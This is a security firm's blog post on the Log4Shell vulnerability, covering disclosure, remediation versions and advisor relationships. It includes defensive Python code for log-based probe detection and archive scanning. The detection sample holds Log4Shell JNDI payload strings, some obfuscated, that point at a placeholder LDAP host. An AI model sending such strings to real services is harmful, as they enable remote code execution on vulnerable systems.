Log4J Vulnerability Still Looms: What We Can Learn from the Past About the Current Risks
Around this time last year (December 9th, to be exact), Apache disclosed a vulnerability in Apache Log4j 2 rated CVSS 10.0, the highest possible score. The flaw, tracked as CVE-2021-44228 and widely known as Log4Shell, was disclosed at the start of the winter holidays, which is a particularly challenging time to effect technology changes within any organization.
The critical Log4j vulnerability received an incredible amount of coverage in mainstream news outlets, mostly because it allows Remote Code Execution (RCE): an attacker can run code of their choosing on the vulnerable system. In this case the trigger was simply getting the application to log an attacker-supplied string, which for an internet-facing service can be as easy as sending an HTTP request with a crafted header. Information on the vulnerability was released quickly, and updates arrived constantly. It was a race for security teams to identify and patch their systems.
Since the Log4j vulnerability consumed headlines, the term was used constantly. Remember: Log4j is a Java logging library, and a great many systems use it. The vulnerability is remote code execution, and remediation means upgrading to a fixed version (removing the JndiLookup class from the library was Apache’s recommended stop-gap where an immediate upgrade was not possible). Because logging libraries are embedded everywhere, even an organization that doesn’t use Log4j directly very likely relies on a vendor or connected system that does. In short: Log4j became an issue for every organization.
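The exploit string that made the above possible is a Log4j lookup of the form `${jndi:...}`, and attackers quickly started hiding it behind nested lookups (`${lower:j}`, the default-value form `${::-j}`) and URL encoding. The following detection routine is an added example, not code from the original post or from Kuma: it normalizes web-server log lines the way Log4j’s own string substitution would and flags any line that collapses to a JNDI lookup. The sample log lines are constructed for the example and use RFC 5737 documentation addresses; the handling of unknown lookups (assumed to resolve to an empty string) is a simplification for matching purposes.

```python
"""Added detection example (not Kuma's or the author's code): flag Log4Shell
probe strings in web-server log lines. The exploit string is a Log4j lookup,
${jndi:...}, and attackers hid it behind nested lookups such as ${lower:j}
or the default-value form ${::-j}, so the lines are normalized before matching.
"""
import re
from urllib.parse import unquote

# innermost ${...} with no nested ${ or } inside
INNERMOST = re.compile(r"\$\{([^${}]*)\}")
JNDI = re.compile(r"\$\{jndi:[^}]*\}", re.IGNORECASE)
SOURCE_IP = re.compile(r"^(\S+)")


def _resolve(match):
    """Resolve one innermost lookup roughly as Log4j's string substitution would."""
    inner = match.group(1)
    low = inner.lower()
    if low.startswith("jndi:"):
        return match.group(0)             # keep the interesting one intact
    if low.startswith("lower:"):
        return inner[6:].lower()
    if low.startswith("upper:"):
        return inner[6:].upper()
    if ":-" in inner:
        return inner.split(":-", 1)[1]    # ${env:NOPE:-j} and ${::-j} both yield "j"
    return ""                             # assumption: unknown lookup resolves to nothing


def normalize(text):
    """URL-decode, then collapse nested lookups until nothing changes."""
    s = unquote(text)
    while True:
        new = INNERMOST.sub(_resolve, s)
        if new == s:
            return s
        s = new


def find_probes(log_text):
    """(line number, source IP, normalized payload) for each line carrying ${jndi:...}."""
    hits = []
    for number, line in enumerate(log_text.splitlines(), start=1):
        m = JNDI.search(normalize(line))
        if m:
            ip = SOURCE_IP.match(line)
            hits.append((number, ip.group(1) if ip else "?", m.group(0)))
    return hits


# constructed sample lines (Apache combined format, RFC 5737 documentation addresses)
SAMPLE_LOG = """\
203.0.113.7 - - [10/Dec/2021:03:14:15 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.9:1389/a}"
203.0.113.7 - - [10/Dec/2021:03:14:16 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${lower:l}dap://198.51.100.9:1389/a}"
203.0.113.7 - - [10/Dec/2021:03:14:17 +0000] "GET /?q=%24%7B%24%7B%3A%3A-j%7Dndi%3Aldap%3A%2F%2F198.51.100.9%3A1389%2Fa%7D HTTP/1.1" 200 512 "-" "curl/7.79.1"
198.51.100.23 - - [10/Dec/2021:03:14:18 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
198.51.100.23 - - [10/Dec/2021:03:14:19 +0000] "GET /price?item=${total} HTTP/1.1" 200 88 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for number, ip, payload in find_probes(SAMPLE_LOG):
        print(f"line {number}: {ip} -> {payload}")
```

This is a heuristic for triage, not a complete detector: attackers varied the lookup names and encodings further, and the only reliable signal that a lookup actually fired is outbound LDAP, RMI or DNS traffic from the application host, so pair log matching with egress monitoring.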
Once the information was released, organizations began discovery efforts to determine which of their systems were affected. Many companies were quick to seize the opportunity to offer their own Log4j discovery services, which flooded the landscape with repeated, and at times outdated, information aimed at capitalizing on the crisis. Timing was not on our side either, with the disclosure landing in the middle of the American holiday season, and with a vulnerability of this severity every minute counts. Because Log4j is a logging component bundled into such a wide array of systems, the impact reached across the entire technology landscape; I would dare to say every organization had to respond to Log4j in one way or another.
It took some time for the environment to stabilize and for the guidance to present a clear road to remediation. Apache shipped a first fix (Log4j 2.15.0) the day after public disclosure, but that fix proved incomplete, and further releases (2.16.0 and 2.17.0) followed over the next week as additional issues were found.
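The discovery step above is where most teams lost time: log4j-core is rarely installed on its own, it is bundled inside application JARs, WARs and EARs, sometimes several archives deep. The scanner below is an added example (not Kuma’s or the author’s tooling) that walks a directory tree, opens archives recursively, reads the version Maven records in the library’s own pom.properties, checks whether the JndiLookup class is still present, and classifies each hit against the fixed versions from the Apache advisory for the main 2.x line. The look-alike archives it scans are constructed in memory for the example and are not real Log4j builds; the Java 6/7 back-port branches (2.3.x, 2.12.x) have their own fixed releases that are not modelled here.

```python
"""Added discovery example (not Kuma's or the author's code): walk a directory
tree, find log4j-core inside JAR/WAR/EAR archives (including archives nested
inside other archives), read the version Maven records in pom.properties and
classify it against the fixed versions from the Apache Log4j security advisory.
"""
import io
import re
import zipfile
from pathlib import Path

POM_PROPERTIES = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
ARCHIVE_SUFFIXES = (".jar", ".war", ".ear", ".zip")

# Main 2.x release line only: 2.0-beta9 through 2.14.1 are vulnerable to
# CVE-2021-44228, fixed in 2.15.0; 2.17.1 also closed the follow-up CVEs
# (CVE-2021-45046, -45105, -44832). The Java 6/7 back-port branches (2.3.x,
# 2.12.x) have their own fixed releases and are not modelled here.
LOG4SHELL_FIXED = (2, 15, 0)
FULLY_FIXED = (2, 17, 1)


def parse_version(text):
    """'2.14.1' -> (2, 14, 1); '2.0-beta9' -> (2, 0, 0); unparseable -> None."""
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", text.strip())
    return tuple(int(g or 0) for g in m.groups()) if m else None


def classify(version, jndi_present):
    """Risk label for one log4j-core instance."""
    v = parse_version(version)
    if v is None or v[0] != 2:
        return "UNKNOWN"          # Log4j 1.x is not affected by CVE-2021-44228
    if v < LOG4SHELL_FIXED:
        # Stripping JndiLookup.class was Apache's stop-gap for un-upgradable systems
        return "VULNERABLE" if jndi_present else "MITIGATED"
    if v < FULLY_FIXED:
        return "PARTIAL"          # Log4Shell fixed, follow-up CVEs still open
    return "OK"


def scan_archive(data, name):
    """Findings (name, version, label) for an archive and anything nested in it."""
    findings = []
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return findings
    with zf:
        names = set(zf.namelist())
        if POM_PROPERTIES in names:
            props = zf.read(POM_PROPERTIES).decode("utf-8", "replace")
            m = re.search(r"^version=(.*)$", props, re.M)
            version = m.group(1).strip() if m else "?"
            findings.append((name, version, classify(version, JNDI_LOOKUP_CLASS in names)))
        for entry in sorted(names):
            if entry.lower().endswith(ARCHIVE_SUFFIXES):   # fat JARs, WEB-INF/lib, etc.
                findings.extend(scan_archive(zf.read(entry), f"{name}!{entry}"))
    return findings


def scan_tree(root):
    """Scan every archive under a directory on disk."""
    findings = []
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in ARCHIVE_SUFFIXES:
            findings.extend(scan_archive(path.read_bytes(), str(path)))
    return findings


# --- constructed samples: minimal look-alike archives, not real Log4j builds ---
def build_archive(entries):
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for entry_name, content in entries.items():
            zf.writestr(entry_name, content)
    return buf.getvalue()


def fake_log4j_core(version, include_jndi=True):
    entries = {POM_PROPERTIES: f"#Generated by Maven\nversion={version}\n"
                               f"groupId=org.apache.logging.log4j\nartifactId=log4j-core\n"}
    if include_jndi:
        entries[JNDI_LOOKUP_CLASS] = b"\xca\xfe\xba\xbe"   # class-file magic, nothing more
    return build_archive(entries)


def sample_findings():
    samples = {
        "lib/log4j-core-2.14.1.jar": fake_log4j_core("2.14.1"),
        "lib/log4j-core-2.14.1-stripped.jar": fake_log4j_core("2.14.1", include_jndi=False),
        "lib/log4j-core-2.17.1.jar": fake_log4j_core("2.17.1"),
        # a WAR that bundles an old log4j-core two levels down
        "webapps/app.war": build_archive({
            "WEB-INF/web.xml": b"<web-app/>",
            "WEB-INF/lib/log4j-core-2.13.3.jar": fake_log4j_core("2.13.3"),
        }),
    }
    findings = []
    for name, data in samples.items():
        findings.extend(scan_archive(data, name))
    return findings


if __name__ == "__main__":
    for name, version, label in sample_findings():
        print(f"{label:10} {version:8} {name}")
```

Run `scan_tree("/opt")` (or wherever applications live) on a real host to get the same tuples for every archive found. The version string is trusted from the archive, so a vendor that repackaged the library without Maven metadata will show up only if you extend the scan to look for the class file on its own, which is a reasonable second pass.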
When everyone is in a rush to speak, we should take a moment to stop and listen.
Accurate information can be more valuable than immediate information, and sifting through the noise is a challenge. Time is crucial in these moments: when there is a critical vulnerability in a live environment, the urgency puts tremendous pressure on finding a solution. That is the cost of time-sensitive situations: the accuracy of what is shared suffers when it is rushed.
Getting the information right the first time and avoiding jumping to conclusions can greatly reduce frustration. But how can someone be sure the information they are getting is accurate? Cross-referencing what traditional media outlets report against first-hand observations gathered in real time is perhaps the most effective way for enterprises to validate what they are hearing.
To reliably access this kind of first-hand information, organizations should prioritize building relationships with members of the cyber security industry. A trusted advisor entrenched in the cyber security space can decode some of the most difficult-to-digest security concepts and, more importantly, can discuss issues in real time as soon as they come up. The coverage a security firm like Kuma maintains of the threat landscape can be an asset to any organization trying to gain visibility over blind spots. These relationships should be built on trust and understanding.
We should never make assumptions. Something as simple as assuming the definition of a single word can lead to a chain of miscommunications, ultimately impairing an organization’s ability to make effective security decisions. When performing security research, the understanding of concepts is often nested, with each concept opening a new rabbit hole. Grow a trusted network of advisors who have a pulse on the threat landscape, and let an expert sort through this data for your team.
Click here to connect with a battle-tested and empathetic security expert today.
Catalino (Cat) Vega has the unique skill of communicating at a high level with senior leaders and at a technical level with hands-on staff, helping organizations get control over their security posture. He started his career in the USAF as a Staff Sergeant leading Network Operations for an entire base. Cat left the service in 2013, and from there he ran assessments on the nation’s largest data centers and performed CISO functions for a diverse set of healthcare clients.
At Kuma, Cat is responsible for running specific client engagements in a CISO capacity, managing our vendor relationships, and helping organizations mature their application security programs at a technical level.